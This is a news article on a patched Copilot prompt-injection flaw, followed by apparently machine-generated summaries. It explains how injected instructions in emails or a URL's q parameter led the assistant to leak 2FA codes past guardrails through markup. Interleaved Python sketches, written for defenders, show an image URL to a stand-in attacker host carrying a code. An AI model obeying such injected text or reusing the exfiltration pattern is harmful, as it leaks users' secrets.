Critical Copilot vulnerability allowed hackers to steal 2FA codes from users

Last Tuesday, Microsoft patched a vulnerability it rated as max critical in its M365 Copilot AI platform. On Monday, the researchers who discovered the vulnerability and reported it to Microsoft revealed how their proof-of-concept exploit could retrieve 2FA codes and other sensitive data from emails accessible to Copilot.
Microsoft and other LLM providers have been unable to prevent their products from complying with malicious requests to reveal data. The root cause: AI bots are unable to distinguish between instructions provided by users and those snuck into third-party content the models are summarizing, drafting responses to, or using to perform other actions on behalf of the user. With no way to secure this crucial boundary, Microsoft and its peers are left to erect complicated and ad hoc guardrails designed to rein in the consequences of this incurable gullibility.
Jumping over guardrails
One guardrail built into Copilot and most other LLMs prevents them from submitting web forms, sending emails, and taking similar actions that can be used to exfiltrate data from the user. To work around this, LLM hackers turned to markup language, which, among other things, allows users to add formatting elements such as headings, lists, and links to text without the need for HTML tags. Another workaround is to wrap sensitive data inside certain HTML tags. In either case, a web request containing the data hits the attacker’s web server, where the secret information is captured in logs.
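To make the mechanism concrete, here is a minimal Python sketch of how data placed in a URL ends up in front of whoever runs the receiving server. It assumes the markup in question is Markdown image syntax, which the article does not specify. The host `attacker.example`, the parameter name `d`, and the code `123456` are hypothetical placeholders.

```python
import re
from urllib.parse import urlparse, parse_qs

# Markdown image syntax: ![alt](url). A renderer requests the URL on its own,
# without the user clicking anything. (Assumed syntax, for illustration only.)
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

def auto_fetched_urls(markdown_text: str) -> list:
    """Return the URLs a Markdown renderer would request automatically."""
    return MD_IMAGE.findall(markdown_text)

def logged_query(url: str) -> dict:
    """Return the query parameters the receiving server would see and log."""
    return parse_qs(urlparse(url).query)

# Hypothetical model output in which a code from an email sits in an image URL.
output = "Here is your summary. ![status](https://attacker.example/pixel.png?d=123456)"

for url in auto_fetched_urls(output):
    print(urlparse(url).hostname, logged_query(url))
```

A defender could run the same scan over model output before rendering it and flag any automatically fetched URL that carries query data to an unfamiliar host.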
One Microsoft guardrail wraps Copilot output in blocks that the browser treats as plain text. Another restricts the sites Copilot is permitted to visit without explicit approval. While Copilot has blanket permission to send requests to Microsoft domains, guardrails restrict requests to untrusted sites.
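The two guardrails described here can be sketched in a few lines of Python. This is an illustration of the general techniques (escaping output and checking hosts against an allowlist), not Microsoft's implementation. The function names and the single-entry allowlist are assumptions made for the example.

```python
import html
from urllib.parse import urlparse

# Illustrative allowlist; the article does not give the real list of trusted domains.
TRUSTED_DOMAINS = ("microsoft.com",)

def render_as_plain_text(model_output: str) -> str:
    """Escape markup so a browser displays it as text instead of interpreting it."""
    return html.escape(model_output)

def is_request_allowed(url: str, trusted=TRUSTED_DOMAINS) -> bool:
    """Allow a request only to a trusted domain or one of its subdomains."""
    host = (urlparse(url).hostname or "").lower()
    return any(host == d or host.endswith("." + d) for d in trusted)

print(render_as_plain_text('<img src="https://attacker.example/?d=123456">'))
print(is_request_allowed("https://www.microsoft.com/en-us/"))         # True
print(is_request_allowed("https://microsoft.com.attacker.example/x"))  # False
```

Matching on the parsed hostname, with a leading dot for subdomains, is what keeps a lookalike such as `microsoft.com.attacker.example` from passing a naive substring check.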
Security firm Varonis devised an exploit chain that was able to catapult over these guardrails. The first element was what the researchers call a Parameter-to-Prompt Injection. The parameter in this case is the q in a URL, which is used to flag a query that has been included. The Parameter-to-Prompt Injection is a close relative of the prompt injection. The difference is that the malicious command is located in the query parameter, rather than in an email or other piece of untrusted content.
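A short Python sketch shows why a query parameter is untrusted input: whoever writes the link chooses the text the assistant receives. The host `copilot.example`, the `/chat` path, and the function name are hypothetical; only the parameter name `q` comes from the researchers' description.

```python
from typing import Optional
from urllib.parse import urlparse, parse_qs, quote

def prefilled_prompt(url: str) -> Optional[str]:
    """Return the text carried in the q parameter, or None if it is absent."""
    values = parse_qs(urlparse(url).query).get("q")
    return values[0] if values else None

# The link author, not the person who clicks, decides what this string says.
injected = "instructions chosen by whoever crafted this link"
link = "https://copilot.example/chat?q=" + quote(injected)

print(link)
print(prefilled_prompt(link))
```

Because the decoded value arrives looking like something the user typed, an application that forwards it to the model unchanged gives the link's author the user's voice.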

`Facts Only`

Microsoft patched a critical vulnerability in its M365 Copilot AI platform last Tuesday. The vulnerability was discovered and reported by security researchers. Researchers demonstrated a proof-of-concept exploit that could retrieve 2FA codes and other sensitive data from emails accessible to Copilot. The exploit leveraged the AI’s inability to distinguish between user instructions and malicious commands embedded in third-party content. AI systems like Copilot cannot inherently secure the boundary between trusted and untrusted inputs. Guardrails in Copilot and other LLMs include blocking web form submissions and restricting access to untrusted sites. Attackers bypassed these guardrails using markup language and HTML tags to exfiltrate data. One workaround involved wrapping sensitive data in HTML tags so that it was sent to attacker-controlled servers. Microsoft’s guardrails include wrapping Copilot output in blocks the browser treats as plain text and restricting unapproved site access. Security firm Varonis devised an exploit chain using "Parameter-to-Prompt Injection," where malicious commands were hidden in URL query parameters. The vulnerability was rated as "max critical" by Microsoft. The patch was released before the researchers publicly revealed how their exploit worked.

`Executive Summary`

Microsoft recently patched a critical vulnerability in its M365 Copilot AI platform after researchers demonstrated how it could be exploited to extract sensitive data, including two-factor authentication codes, from emails. The flaw stems from the AI's inability to distinguish between legitimate user instructions and malicious commands embedded in third-party content, such as URLs or emails. While Microsoft and other AI providers have implemented guardrails, such as blocking web form submissions or restricting access to untrusted sites, researchers at Varonis bypassed these by using markup language and HTML tags to exfiltrate data. Their exploit involved a "Parameter-to-Prompt Injection," where malicious commands were hidden in URL query parameters. This highlights a broader challenge: AI systems lack inherent mechanisms to secure the boundary between trusted and untrusted inputs, forcing providers to rely on reactive, ad hoc defenses.
The incident underscores the tension between AI functionality and security. Copilot’s design allows it to interact with user data to perform tasks, but this same capability can be weaponized. Microsoft’s guardrails, such as wrapping output in blocks the browser treats as plain text or restricting site access, were circumvented through creative exploitation of markup and HTML. The vulnerability raises questions about the long-term viability of current AI security models, particularly as attackers adapt to evade protections. While the patch addresses this specific flaw, the underlying issue, AI’s inability to contextualize trust, remains unresolved, leaving systems vulnerable to similar attacks in the future.

`Full Take`

This incident reveals a fundamental tension in AI design: the trade-off between utility and security. AI systems like Copilot are built to process and act on user data dynamically, but this same flexibility makes them vulnerable to manipulation. The researchers’ exploit, which used markup and URL parameters to bypass guardrails, demonstrates how attackers adapt to defensive measures, exposing the fragility of reactive security models. The deeper issue isn’t just a technical flaw but a paradigm problem: AI lacks the contextual awareness to distinguish intent, forcing providers to play whack-a-mole with exploits rather than addressing the root cause.
The narrative here is strong in its technical clarity but risks oversimplifying the broader implications. While the focus is on Microsoft’s specific vulnerability, the pattern echoes systemic challenges in AI security, what might be called "ARC-0012 Trust Boundary Collapse," where systems fail to maintain distinctions between safe and unsafe inputs. The reliance on ad hoc guardrails, rather than foundational fixes, suggests an industry-wide struggle to balance innovation with risk. Who benefits from this dynamic? AI providers gain rapid deployment, but users bear the cost of persistent vulnerabilities. Second-order consequences could include erosion of trust in AI assistants or regulatory pressure to impose stricter controls.
Bridge questions: If AI cannot inherently secure trust boundaries, what architectural changes would be needed to mitigate this risk? How might attackers evolve their tactics as guardrails become more sophisticated? And crucially, what incentives would drive AI providers to prioritize foundational security over feature expansion?
Counterstrike scan: A coordinated influence campaign might amplify this story to undermine confidence in AI adoption, framing it as an existential security failure. However, the content here is technically grounded and avoids sensationalism, aligning with legitimate security research rather than a manipulative playbook. No structural alignment with attack patterns detected.

`Sentinel — Human`

Confidence
15%

The text exhibits the structure and detail typical of high-quality security journalism, focusing on specific mechanisms and attributing specialized concepts clearly.

Jun 16, 2026, 03:29 PM | Consumer Tech & Electronics